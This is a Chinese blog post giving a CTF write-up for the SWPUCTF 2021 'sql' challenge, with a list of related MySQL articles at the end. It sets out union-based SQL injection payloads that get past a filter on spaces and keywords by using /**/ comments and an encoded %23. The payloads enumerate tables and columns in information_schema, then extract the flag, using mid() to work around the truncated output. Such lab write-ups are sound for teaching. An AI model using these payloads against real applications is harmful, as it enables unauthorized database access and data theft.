首页 > 数据库 >[SWPUCTF 2021 新生赛]sql

[SWPUCTF 2021 新生赛]sql

时间:2023-03-07 20:22:23浏览次数:41  
标签:group 23 union SWPUCTF flag 2021 sql concat select

[SWPUCTF 2021 新生赛]sql-绕过

首先直接通过wllm=1' 发现有语句报错

之后直接开始手测规则发现屏蔽了

= 空格 + and or <> # 

空格的绕过方法很多,但是通过第一轮测试还发现一个问题就是最后的单引号必须为URL编码后的,编码前的通过BP发包过去还是会爆语法错误,具体原因不知道,希望以后有师傅能够解答

1'order/**/by/**/3%23 

之后就是走流程,由于版本不是8版本没有table所以用union select

-1'union/**/select/**/1,2,database()%23
-1'union/**/select/**/1,2,group_concat(table_name)from(information_schema.tables)where(table_schema)like'test_db'%23
# 没法用and但是没关系直接爆所有列
-1'union/**/select/**/1,2,group_concat(column_name)from(information_schema.columns)where(table_schema)like'test_db'%23
-1'union/**/select/**/1,2,group_concat(flag)from`LTLT_flag`%23

到最后一步发现只有一部分??

没事测试一啊截断函数,发现sub、left、right都被屏蔽了,只能用mid,之后看wp发现还有reverse函数

mid()、substr()、left()、right()
-1'union/**/select/**/1,2,mid(group_concat(flag),15,15)from`LTLT_flag`%23
-1'union/**/select/**/1,2,mid(group_concat(flag),30,20)from`LTLT_flag`%23

标签:group,23,union,SWPUCTF,flag,2021,sql,concat,select
From: https://www.cnblogs.com/0xo0Kerk/p/17189499.html

相关文章

  • MySQL用户新建表报1227异常
    1、MySQL8新建用户createuser'firestone'@'%'identifiedby'123456';2、给用户授予test库所有权限grantallprivilegesonfirestone_pretank.*to'firestone'@'%';3......
  • MySQL5.7主从复制教程
     MySQL5.7主从复制教程 ​简述:主从复制,是用来建立一个和主数据库完全一样的数据库环境,称为从数据库,主数据库一般是准实时的业务数据库、事务处理库,从库做查询库。......
  • 13 款炫酷的 MySQL 可视化管理工具!
    13款炫酷的MySQL可视化管理工具!2022-12-2615:07·程序员柠檬橙我是柠檬哥,专注编程知识分享。欢迎关注@程序员柠檬橙,编程路上不迷路私信发送1024打包下载10个G编......
  • 【.NET Core 6】使用EF Core 访问Oracle+Mysql+PostgreSQL并进行简单增改操作与性能比
    前言唠嗑一下。都在说去O或者开源,但是对于数据库选型来说,很多人却存在着误区。例如,去O,狭义上讲,是去Oracle数据库。但是从广义上来说,是去Oracle公司产品或者具有漂亮国垄断......
  • mysql 去除重复字符串的函数
    CREATEDEFINER=`root`@`localhost`FUNCTION`deleteManyChar`(in_strvarchar(2000))RETURNSvarchar(2000)CHARSETutf8COLLATEutf8_unicode_ciBEGINDECLAREv_r......
  • 使用Mycat构建MySQL读写分离、主从复制、主从高可用
    数据库读写分离对于大型系统或者访问量很高的互联网应用来说,是必不可少的一个重要功能。 从数据库的角度来说,对于大多数应用来说,从集中到分布,最基本的一个需求不是数据存......
  • MySQL索引Index指南
    MySQL索引的建立对于MySQL的高效运行是很重要的,索引可以大大提高MySQL的检索速度。打个比方,如果合理的设计且使用索引的MySQL是一辆兰博基尼的话,那么没有设计和使用索引的M......
  • Linux安装MySQL
    演示系统:CentOS-7-x86_64。一、软件下载线上下载:MySQLProductArchives某度下载:wget下载:wgethttps://cdn.mysql.com/archives/mysql-8.0/mysql-8.0.30-1.el7.x86_6......
  • 如何解决MySQL字符集乱码问题
    MySQL自4.1版本推出之后由于中文的特殊性带来的乱码问题也随在互联网行业出现。主要原因就是不同字符集编码不同而产生的。本文简要介绍字符集相关知识及部分乱码情况的解决......
  • MySQL 并行复制方案演进历史及原理分析
    预告:《MySQL实战》即将出版,敬请关注!有线上MySQL维护经验的童鞋都知道,主从延迟往往是一个让人头疼不已的问题。不仅仅是其造成的潜在问题比较严重,而且问题的定位尤其考......